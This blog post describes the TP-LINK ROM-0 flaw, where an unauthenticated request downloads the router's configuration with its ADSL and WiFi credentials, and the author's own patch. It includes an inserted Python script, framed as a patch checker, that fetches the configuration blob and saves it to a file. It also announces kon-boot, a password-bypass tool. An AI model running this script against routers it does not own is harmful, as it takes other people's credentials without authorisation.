Recently a critical vulnerability was found in TP-LINK routers and a few other router devices. The particular vulnerability I am referring to was described here. Basically it is the so-called ROM-0 attack. In short, an attacker who simply requests ROM-0 over plain HTTP (i.e. http://192.168.1.1/ROM-0) can, without any authentication, download all the important and secret data stored in your router: the ADSL login/password combination, the WiFi password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap, so I decided to patch the vulnerability myself.
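To check whether a given router is affected (or whether a patch like the one described in the linked article actually closed the hole), the following Python script sends the unauthenticated GET for ROM-0 and classifies the answer. It is an added example, not code from the original post or from TP-LINK; the target host, port, the "rom-0.bin" output file name and the User-Agent string are assumptions, and the decision rule (a 200 carrying non-HTML data means the configuration was disclosed, while 401/403/404, a redirect, or an HTML login page mean it was not) is the author of this example's own.

```python
# Added example (not from the original post): checker for the unauthenticated
# ROM-0 configuration disclosure described above.  Host, port, output file
# name and User-Agent are assumptions; 192.168.1.1 is the default LAN address
# quoted in the post.
import http.client
from dataclasses import dataclass

ROM0_PATH = "/ROM-0"   # path quoted in the post; pass a different one if the device uses another case


@dataclass
class Rom0Verdict:
    status: int      # HTTP status the router answered with
    leaked: bool     # True if the body looks like the raw configuration blob
    reason: str      # human-readable explanation of the verdict
    body: bytes      # response body, kept so it can be saved as evidence


def classify_rom0_response(status: int, content_type: str, body: bytes) -> Rom0Verdict:
    """Decide whether the reply to GET /ROM-0 disclosed the configuration.

    A patched or unaffected device answers with an auth challenge (401), a
    refusal (403/404) or a redirect to its login page.  A vulnerable one
    serves the configuration blob with 200.  A 200 whose body is an HTML
    page (e.g. a login form) is treated as not leaked.
    """
    ct = (content_type or "").lower()
    head = body.lstrip()[:15].lower()
    if status == 401:
        return Rom0Verdict(status, False, "auth challenge: backup requires a login", body)
    if status in (403, 404):
        return Rom0Verdict(status, False, "path refused or not served", body)
    if 300 <= status < 400:
        return Rom0Verdict(status, False, "redirected (login page)", body)
    if status == 200:
        looks_html = "text/html" in ct or head.startswith(b"<html") or head.startswith(b"<!doctype")
        if looks_html:
            return Rom0Verdict(status, False, "200 but body is an HTML page, not the config", body)
        if not body:
            return Rom0Verdict(status, False, "200 with empty body", body)
        return Rom0Verdict(status, True,
                           "200 with %d bytes of non-HTML data: configuration disclosed" % len(body),
                           body)
    return Rom0Verdict(status, False, "unexpected status %d" % status, body)


def fetch_rom0(host: str, port: int = 80, path: str = ROM0_PATH, timeout: float = 5.0) -> Rom0Verdict:
    """Send the unauthenticated request (no Authorization header at all) and classify the answer."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "rom0-check"})   # assumed UA string
        resp = conn.getresponse()
        body = resp.read()
        return classify_rom0_response(resp.status, resp.getheader("Content-Type", ""), body)
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    try:
        verdict = fetch_rom0(target)
    except (OSError, http.client.HTTPException) as exc:
        sys.exit("request to %s failed: %s" % (target, exc))
    print("%s %s -> HTTP %d: %s" % (target, ROM0_PATH, verdict.status, verdict.reason))
    if verdict.leaked:
        # Keep the blob: it holds the ADSL and WiFi credentials the post talks about.
        with open("rom-0.bin", "wb") as fh:
            fh.write(verdict.body)
        print("saved %d bytes to rom-0.bin" % len(verdict.body))
```

Run it against the router's LAN address before and after patching: a vulnerable firmware produces a "configuration disclosed" verdict and a saved rom-0.bin, a fixed one should answer with an auth challenge or a refusal. Only run it against devices you own or are authorised to test.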

You can read the entire reversing journey here (blogger doesn't like assembly code :-)):
http://piotrbania.com/all/articles/tplink_patch/



In other news:

  • kon-boot v2.4 was released (it now covers the Windows 8/8.1 online account authorization bypass, so you can log into your box without knowing the password even if you use an online MS account)
  • kon-boot for Mac OS X was updated to cover 10.9 Mavericks (both options available: password bypass and new root account)

Peace out!

http://blog.piotrbania.com/2014/01/hacking-and-patching-tp-link-td-w8901g.html